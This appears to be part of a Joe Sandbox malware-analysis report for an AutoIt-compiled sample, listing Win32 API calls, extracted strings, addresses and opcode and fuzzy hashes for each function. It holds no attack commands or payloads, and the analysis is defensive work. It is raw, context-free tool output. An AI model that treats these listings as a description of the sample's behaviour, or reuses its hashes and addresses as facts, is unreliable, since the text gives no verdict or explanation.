              • GetSysColor.USER32(00000012), ref: 00767421
              • SetTextColor.GDI32(?,?), ref: 00767425
              • GetSysColorBrush.USER32(0000000F), ref: 0076743B
              • GetSysColor.USER32(0000000F), ref: 00767446
              • CreateSolidBrush.GDI32(?), ref: 0076744B
              • GetSysColor.USER32(00000011), ref: 00767463
              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00767471
              • SelectObject.GDI32(?,00000000), ref: 00767482
              • SetBkColor.GDI32(?,00000000), ref: 0076748B
              • SelectObject.GDI32(?,?), ref: 00767498
              • InflateRect.USER32(?,000000FF,000000FF), ref: 007674B7
              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007674CE
              • GetWindowLongW.USER32(00000000,000000F0), ref: 007674DB
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0076752A
              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00767554
              • InflateRect.USER32(?,000000FD,000000FD), ref: 00767572
              • DrawFocusRect.USER32(?,?), ref: 0076757D
              • GetSysColor.USER32(00000011), ref: 0076758E
              • SetTextColor.GDI32(?,00000000), ref: 00767596
              • DrawTextW.USER32(?,007670F5,000000FF,?,00000000), ref: 007675A8
              • SelectObject.GDI32(?,?), ref: 007675BF
              • DeleteObject.GDI32(?), ref: 007675CA
              • SelectObject.GDI32(?,?), ref: 007675D0
              • DeleteObject.GDI32(?), ref: 007675D5
              • SetTextColor.GDI32(?,?), ref: 007675DB
              • SetBkColor.GDI32(?,?), ref: 007675E5
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
              • String ID:
              • API String ID: 1996641542-0
              • Opcode ID: c9eb317c55a8b1870ec34115657b56dafaa7ad51c22af75ed506e9f3000f30c3
              • Instruction ID: 5e77953fe0ae5e53e073ba6c4d726d11ad724c936057cc3fc1a2ae2c0381b77a
              • Opcode Fuzzy Hash: c9eb317c55a8b1870ec34115657b56dafaa7ad51c22af75ed506e9f3000f30c3
              • Instruction Fuzzy Hash: 2C616072900218AFDF069FA4DC49EAE7F79EF09360F118115F916AB2A1D7B89940CF94
              APIs
              • GetCursorPos.USER32(?), ref: 00761128
              • GetDesktopWindow.USER32 ref: 0076113D
              • GetWindowRect.USER32(00000000), ref: 00761144
              • GetWindowLongW.USER32(?,000000F0), ref: 00761199
              • DestroyWindow.USER32(?), ref: 007611B9
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007611ED
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0076120B
              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0076121D
              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00761232
              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00761245
              • IsWindowVisible.USER32(00000000), ref: 007612A1
              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007612BC
              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007612D0
              • GetWindowRect.USER32(00000000,?), ref: 007612E8
              • MonitorFromPoint.USER32(?,?,00000002), ref: 0076130E
              • GetMonitorInfoW.USER32(00000000,?), ref: 00761328
              • CopyRect.USER32(?,?), ref: 0076133F
              • SendMessageW.USER32(00000000,00000412,00000000), ref: 007613AA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
              • String ID: ($0$tooltips_class32
              • API String ID: 698492251-4156429822
              • Opcode ID: 51f1f5a2ef300bdacf789e752000f07e32a24241baa57f5194a2af815d7a2a3f
              • Instruction ID: dfedbd7fac7fcbcedf2abbcb37c2fb22ad7444279f19c7ed3efc658e5483ad75
              • Opcode Fuzzy Hash: 51f1f5a2ef300bdacf789e752000f07e32a24241baa57f5194a2af815d7a2a3f
              • Instruction Fuzzy Hash: 90B1BC71604341AFDB44DF64C888B6ABBE4FF88300F44891DF99A9B2A1C774E844CB96
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 007602E5
              • _wcslen.LIBCMT ref: 0076031F
              • _wcslen.LIBCMT ref: 00760389
              • _wcslen.LIBCMT ref: 007603F1
              • _wcslen.LIBCMT ref: 00760475
              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007604C5
              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00760504
                • Part of subcall function 006EF9F2: _wcslen.LIBCMT ref: 006EF9FD
                • Part of subcall function 0073223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00732258
                • Part of subcall function 0073223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0073228A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$MessageSend$BuffCharUpper
              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
              • API String ID: 1103490817-719923060
              • Opcode ID: b0687760aadea202d0b29d0894d8dc8c0343f313711977c67ba5a1b79036be7c
              • Instruction ID: 66262d7673ca1f9feee3293f4e2ffc4d412a22eedae870d1cc206f5c3b4961b6
              • Opcode Fuzzy Hash: b0687760aadea202d0b29d0894d8dc8c0343f313711977c67ba5a1b79036be7c
              • Instruction Fuzzy Hash: 75E19C312182418FCB28DF24C45083BB7E6BF89314B14496DF8979B3A2DB38ED45CB91
              APIs
              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006E8968
              • GetSystemMetrics.USER32(00000007), ref: 006E8970
              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006E899B
              • GetSystemMetrics.USER32(00000008), ref: 006E89A3
              • GetSystemMetrics.USER32(00000004), ref: 006E89C8
              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006E89E5
              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006E89F5
              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006E8A28
              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006E8A3C
              • GetClientRect.USER32(00000000,000000FF), ref: 006E8A5A
              • GetStockObject.GDI32(00000011), ref: 006E8A76
              • SendMessageW.USER32(00000000,00000030,00000000), ref: 006E8A81
                • Part of subcall function 006E912D: GetCursorPos.USER32(?), ref: 006E9141
                • Part of subcall function 006E912D: ScreenToClient.USER32(00000000,?), ref: 006E915E
                • Part of subcall function 006E912D: GetAsyncKeyState.USER32(00000001), ref: 006E9183
                • Part of subcall function 006E912D: GetAsyncKeyState.USER32(00000002), ref: 006E919D
              • SetTimer.USER32(00000000,00000000,00000028,006E90FC), ref: 006E8AA8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
              • String ID: AutoIt v3 GUI
              • API String ID: 1458621304-248962490
              • Opcode ID: 90ca036b657eb90872723f3038cff3e8c8f60c3b23119ed548afd0cfc702bdf6
              • Instruction ID: fe331e6d99001d01456d9528e8ce7a5db171a5cce4727d6a11fed194aaf2b0c1
              • Opcode Fuzzy Hash: 90ca036b657eb90872723f3038cff3e8c8f60c3b23119ed548afd0cfc702bdf6
              • Instruction Fuzzy Hash: 00B18F75A003599FDB14DFA8DC45BAE3BB5FB48314F10822AFA16A7290DB78E841CF54
              APIs
                • Part of subcall function 007310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00731114
                • Part of subcall function 007310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731120
                • Part of subcall function 007310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 0073112F
                • Part of subcall function 007310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731136
                • Part of subcall function 007310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0073114D
              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00730DF5
              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00730E29
              • GetLengthSid.ADVAPI32(?), ref: 00730E40
              • GetAce.ADVAPI32(?,00000000,?), ref: 00730E7A
              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00730E96
              • GetLengthSid.ADVAPI32(?), ref: 00730EAD
              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00730EB5
              • HeapAlloc.KERNEL32(00000000), ref: 00730EBC
              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00730EDD
              • CopySid.ADVAPI32(00000000), ref: 00730EE4
              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00730F13
              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00730F35
              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00730F47
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730F6E
              • HeapFree.KERNEL32(00000000), ref: 00730F75
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730F7E
              • HeapFree.KERNEL32(00000000), ref: 00730F85
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730F8E
              • HeapFree.KERNEL32(00000000), ref: 00730F95
              • GetProcessHeap.KERNEL32(00000000,?), ref: 00730FA1
              • HeapFree.KERNEL32(00000000), ref: 00730FA8
                • Part of subcall function 00731193: GetProcessHeap.KERNEL32(00000008,00730BB1,?,00000000,?,00730BB1,?), ref: 007311A1
                • Part of subcall function 00731193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00730BB1,?), ref: 007311A8
                • Part of subcall function 00731193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00730BB1,?), ref: 007311B7
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
              • String ID:
              • API String ID: 4175595110-0
              • Opcode ID: e0830977437497ec22398bdbf383c3b791d1770c116ca8d3355a8563cac0c123
              • Instruction ID: c366cb2ccd8912e91f2d12477ee66689e63de2c464b4d817d65b030004802b09
              • Opcode Fuzzy Hash: e0830977437497ec22398bdbf383c3b791d1770c116ca8d3355a8563cac0c123
              • Instruction Fuzzy Hash: 79715FB190020AEBEF219FA4DC49FBEBBB8BF05700F048115F959A6152D7799A05CBA0
              APIs
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075C4BD
              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0076CC08,00000000,?,00000000,?,?), ref: 0075C544
              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0075C5A4
              • _wcslen.LIBCMT ref: 0075C5F4
              • _wcslen.LIBCMT ref: 0075C66F
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0075C6B2
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0075C7C1
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0075C84D
              • RegCloseKey.ADVAPI32(?), ref: 0075C881
              • RegCloseKey.ADVAPI32(00000000), ref: 0075C88E
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0075C960
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
              • API String ID: 9721498-966354055
              • Opcode ID: d1c50cf91de5fcf7162d8175df4e52af8ebba025115b202dc294a053b0fa2500
              • Instruction ID: 3d1e5a5c1bf9f969cf39678abe4ae1ea190436f0a9e9305c36b4f5bb90e4cf64
              • Opcode Fuzzy Hash: d1c50cf91de5fcf7162d8175df4e52af8ebba025115b202dc294a053b0fa2500
              • Instruction Fuzzy Hash: 041265316043019FDB15DF14C881B6AB7E6EF88714F04889DF88A9B3A2DB75ED45CB86
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 007609C6
              • _wcslen.LIBCMT ref: 00760A01
              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00760A54
              • _wcslen.LIBCMT ref: 00760A8A
              • _wcslen.LIBCMT ref: 00760B06
              • _wcslen.LIBCMT ref: 00760B81
                • Part of subcall function 006EF9F2: _wcslen.LIBCMT ref: 006EF9FD
                • Part of subcall function 00732BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00732BFA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$MessageSend$BuffCharUpper
              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
              • API String ID: 1103490817-4258414348
              • Opcode ID: b4af81b1ddc4968bd0f79cd10d5f0c44f1160a1528fd0e358bf02ff7ce68ed49
              • Instruction ID: 04dbe636cf8e561c7d453acd2a8e7893e6bc889a1034b387f0f490ce66d3a86b
              • Opcode Fuzzy Hash: b4af81b1ddc4968bd0f79cd10d5f0c44f1160a1528fd0e358bf02ff7ce68ed49
              • Instruction Fuzzy Hash: B1E19B716087018FCB14DF24C45092BB7E2BF98354F148A5DF89A9B3A2DB39ED45CB92
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$BuffCharUpper
              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
              • API String ID: 1256254125-909552448
              • Opcode ID: de7dfea91e7efa3be898fd113bfdd0781fe4e29cbb1a4b5c8a086a0451928232
              • Instruction ID: f87b5bd4aac68ed4e85dc9caf4e280d90faeda04030946cff4c211237e982e9c
              • Opcode Fuzzy Hash: de7dfea91e7efa3be898fd113bfdd0781fe4e29cbb1a4b5c8a086a0451928232
              • Instruction Fuzzy Hash: 2171163260036A8FCF22DE7CCD417FB37929B61751B244528FC56A7284EAB9CD48C3A4
              APIs
              • _wcslen.LIBCMT ref: 0076835A
              • _wcslen.LIBCMT ref: 0076836E
              • _wcslen.LIBCMT ref: 00768391
              • _wcslen.LIBCMT ref: 007683B4
              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007683F2
              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00765BF2), ref: 0076844E
              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00768487
              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007684CA
              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00768501
              • FreeLibrary.KERNEL32(?), ref: 0076850D
              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0076851D
              • DestroyIcon.USER32(?,?,?,?,?,00765BF2), ref: 0076852C
              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00768549
              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00768555
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
              • String ID: .dll$.exe$.icl
              • API String ID: 799131459-1154884017
              • Opcode ID: d1ff607b6ce1307a88a1248954ea99055940d1b6e9293a6d181f2625c7cc5108
              • Instruction ID: 9ed7bf26ed66169a14c575a7095c0dc1af235f3b816747f53ebc24dd89417597
              • Opcode Fuzzy Hash: d1ff607b6ce1307a88a1248954ea99055940d1b6e9293a6d181f2625c7cc5108
              • Instruction Fuzzy Hash: E861D171540219BAEB54DF64CC41BBF7BA8FB04711F10860AFD16D61D1DFB8AA50C7A4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
              • API String ID: 0-1645009161
              • Opcode ID: 80c22b7a6efac1551a8dd06e7b7b69bfecbb8794799df90a28080f5ca0e33a0a
              • Instruction ID: 38c1538164f9b5bcfe7b821dc5538857447e3ed4f05df522a62635104860f13a
              • Opcode Fuzzy Hash: 80c22b7a6efac1551a8dd06e7b7b69bfecbb8794799df90a28080f5ca0e33a0a
              • Instruction Fuzzy Hash: 978119B1A00209BBDB25AF64DC42FFE3766AF55300F04442AF905AB292FB74D941D7A5
              APIs
              • LoadIconW.USER32(00000063), ref: 00735A2E
              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00735A40
              • SetWindowTextW.USER32(?,?), ref: 00735A57
              • GetDlgItem.USER32(?,000003EA), ref: 00735A6C
              • SetWindowTextW.USER32(00000000,?), ref: 00735A72
              • GetDlgItem.USER32(?,000003E9), ref: 00735A82
              • SetWindowTextW.USER32(00000000,?), ref: 00735A88
              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00735AA9
              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00735AC3
              • GetWindowRect.USER32(?,?), ref: 00735ACC
              • _wcslen.LIBCMT ref: 00735B33
              • SetWindowTextW.USER32(?,?), ref: 00735B6F
              • GetDesktopWindow.USER32 ref: 00735B75
              • GetWindowRect.USER32(00000000), ref: 00735B7C
              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00735BD3
              • GetClientRect.USER32(?,?), ref: 00735BE0
              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00735C05
              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00735C2F
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
              • String ID:
              • API String ID: 895679908-0
              • Opcode ID: bd7462111b9fd9440a9b398c3dd00e82ef9826fbbcf745ab37f591e42f29a42c
              • Instruction ID: e5fc60b5c4976b6e09ffbd9301ec72b4a315fc50e295a05c331f14811f42206d
              • Opcode Fuzzy Hash: bd7462111b9fd9440a9b398c3dd00e82ef9826fbbcf745ab37f591e42f29a42c
              • Instruction Fuzzy Hash: 79718E71900B09EFEB21DFA8CE85BAEBBF5FF48704F104518E582A25A1D779E940CB54
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen
              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[y
              • API String ID: 176396367-3387399910
              • Opcode ID: 98a7ece8accede00da7a48507520c300edbb011be0d88278d20f48b12fde8959
              • Instruction ID: 040b674cb789fe72fafa46d0a0cce46a2112abe4a959f54d375696d2b52a7210
              • Opcode Fuzzy Hash: 98a7ece8accede00da7a48507520c300edbb011be0d88278d20f48b12fde8959
              • Instruction Fuzzy Hash: 0FE1E632A005269BEF359FB8C4516FEFBB1BF44710F54812AE456E7242DB38AE4587D0
              APIs
              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 006F00C6
                • Part of subcall function 006F00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(007A070C,00000FA0,B85C0925,?,?,?,?,007123B3,000000FF), ref: 006F011C
                • Part of subcall function 006F00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,007123B3,000000FF), ref: 006F0127
                • Part of subcall function 006F00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,007123B3,000000FF), ref: 006F0138
                • Part of subcall function 006F00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006F014E
                • Part of subcall function 006F00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006F015C
                • Part of subcall function 006F00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006F016A
                • Part of subcall function 006F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006F0195
                • Part of subcall function 006F00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006F01A0
              • ___scrt_fastfail.LIBCMT ref: 006F00E7
                • Part of subcall function 006F00A3: __onexit.LIBCMT ref: 006F00A9
              Strings
              • kernel32.dll, xrefs: 006F0133
              • WakeAllConditionVariable, xrefs: 006F0162
              • InitializeConditionVariable, xrefs: 006F0148
              • SleepConditionVariableCS, xrefs: 006F0154
              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 006F0122
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
